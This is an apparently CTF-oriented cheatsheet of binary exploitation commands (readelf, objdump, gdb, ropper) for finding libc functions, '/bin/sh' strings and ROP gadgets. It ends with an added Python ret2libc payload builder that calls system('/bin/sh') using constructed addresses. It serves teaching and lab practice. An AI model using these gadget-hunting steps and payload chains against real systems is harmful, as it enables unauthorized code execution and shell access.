Binary Exploitation Cheatsheet


ELF INFO 

#Hex to Decimal
printf "%d\n" 0x18

#Get ELF headers
readelf -h hello_world

#Get Program Headers - 9 Headers
readelf --wide -l hello_world

#Get the sections of an ELF
readelf --wide -S hello_world

#Get the contents of a section 
readelf -x .rodata hello_world

#get the hex data of any section from a binary file 
readelf -x .text hello_world
readelf -x .rodata hello_world

#get a specific function using readelf
readelf -a /usr/lib32/libc-2.31.so | grep mprotect 

#Print Symbols from a binary 
objdump --wide -t symbol

#Object Dump 
objdump -D hello_world

#get shellcode from the binary
for i in $(objdump -d ./Hello_stack |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo


#Generate assembly - it will generate the hello.s file
gcc -S hello.c

#Compile without linking; will generate the object file hello.o
gcc -c hello.c

#Compile a file 
gcc hello.c -o hello
# For the gdb commands below, set a breakpoint and run the program first (libraries are only mapped once the process is running)


#Search for the address of system (or any other function) in a binary using objdump, or from
# gdb using `p system`
objdump -M intel -D vuln | grep 'system' -A 3 

#Get PLT/GOT function names after disassembling all sections 
objdump -d vuln | grep ">:"

#Display the dynamic relocation entries in the file
#address of functions in the GOT
objdump -R vuln

# Find system address
p system 
xinfo system              # gef

#Find Exit address 
p exit 

#Check whether libc is mapped, and get its base address (the first address of the first libc mapping)
# Copying libc to the current working directory makes it easier to work with
# Default path = /lib/x86_64-linux-gnu/libc-2.27.so
vmmap libc 

#Find JMP RSP, JMP RAX or any other instruction
# if you are unable to find an instruction in your vuln binary, search for it in libc
ropper
> file ./vuln or file ./libc
> search jmp rsp

#if you are unable to find a JMP instruction, try CALL
> search call rsp

#Finding "/bin/sh"
find "/bin/sh"            # peda
search-pattern "sh"       # gef
strings -a -t x libc-2.27.so | grep "/bin/sh"
ropper --file libc-2.27.so --string '/bin/sh'

# Search for ret instruction, look for a single ret without any other instructions. 
ropper --file libc-2.27.so --search "ret"
0x00000000000008aa: ret; 

#Addresses taken from libc externally (ropper, strings) are offsets: add the libc base address (the first address from `vmmap libc`) to the offset to get the runtime address. The same applies to any other gadget or instruction.

#Change ropper search depth
# /1/ - 1 level down, /2/ - 2 levels down
# for ret2libc, prefer a gadget that ends with ret
ropper
> file ./vuln_file or file ./libc
> search /1/ pop rdi 


#Keep the STDIN open 
(cat payload;cat ) | ./vuln


# if the exact instruction cannot be found
- Ex: we are looking for `pop rdx; ret;` but only find `pop rdx; pop r12; ret;` - after passing the argument for pop rdx, send some dummy data for pop r12 as shown below
- buffer += pack("<Q",0x414141414141)  #Dummy for pop r12


#Get the base address of the stack
- set a breakpoint at main and run the program, then take the first address of the stack mapping
- the same output shows whether the stack is executable or not
vmmap stack 

#Get Base address of LIBC 
vmmap libc 

# When trying any Return2 exploits
- it is better to add an extra "ret" address before the pop rdi; ret gadget
- this avoids 16-byte stack alignment issues (e.g. movaps crashing inside system)
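Added example (not code from the original page): it rebases ropper/strings offsets onto the `vmmap libc` base, pads a `pop rdi; pop r12; ret` gadget with a dummy slot, and counts stack slots to decide whether the extra `ret` is needed. It generalizes the rule above: `pop rdi; ret` needs the extra ret, a two-pop gadget does not. All addresses and offsets are constructed, and it assumes rsp % 16 == 8 at the vulnerable function's `ret`, which holds for an ordinary frame.

```python
import struct

# Constructed sample values (not from any real libc). In practice the base comes
# from `vmmap libc` and the offsets from ropper / strings on the same libc build.
LIBC_BASE = 0x7ffff7dc0000          # constructed: first address printed by `vmmap libc`
OFF_RET = 0x8aa                     # the `ret;` gadget offset shown in the ropper output above
OFF_POP_RDI_RET = 0x2155f           # constructed: `pop rdi; ret`
OFF_POP_RDI_POP_R12_RET = 0x2164c   # constructed: `pop rdi; pop r12; ret`
OFF_SYSTEM = 0x4f550                # constructed
OFF_BINSH = 0x1b3e1a                # constructed
DUMMY = 0x414141414141              # junk value popped into r12

def libc_addr(offset):
    """Rebase an offset taken from ropper/strings onto the runtime libc base."""
    return LIBC_BASE + offset

def rsp_mod16_at_system(num_slots, rsp_mod16_at_ret=8):
    """rsp % 16 when system() is entered. Every 8-byte slot after the saved
    return address is consumed by exactly one `ret` or `pop`, so rsp advances
    by 8 per slot. Assumption: rsp % 16 == 8 at the vulnerable function's
    `ret` (normal frame); the SysV ABI expects rsp % 16 == 8 at function entry."""
    return (rsp_mod16_at_ret + 8 * num_slots) % 16

def build_chain(gadget_offset, pops, rsp_mod16_at_ret=8):
    """Slots after the saved return address: gadget, "/bin/sh" for rdi, junk
    for any extra pops, then system. A leading `ret` is inserted only when
    the slot count would otherwise leave system() misaligned."""
    slots = [libc_addr(gadget_offset), libc_addr(OFF_BINSH)]
    slots += [DUMMY] * (pops - 1)                # e.g. the dummy for pop r12
    slots.append(libc_addr(OFF_SYSTEM))
    if rsp_mod16_at_system(len(slots), rsp_mod16_at_ret) != 8:
        slots.insert(0, libc_addr(OFF_RET))      # one extra ret shifts rsp by 8
    return slots

def payload(padding_len, slots):
    """Padding up to the saved return address, then the packed 64-bit slots."""
    return b"A" * padding_len + b"".join(struct.pack("<Q", s) for s in slots)

if __name__ == "__main__":
    for name, off, pops in (("pop rdi; ret", OFF_POP_RDI_RET, 1),
                            ("pop rdi; pop r12; ret", OFF_POP_RDI_POP_R12_RET, 2)):
        chain = build_chain(off, pops)
        print(name, "-> slots:", len(chain),
              "extra ret added:", chain[0] == libc_addr(OFF_RET))
```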



Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.
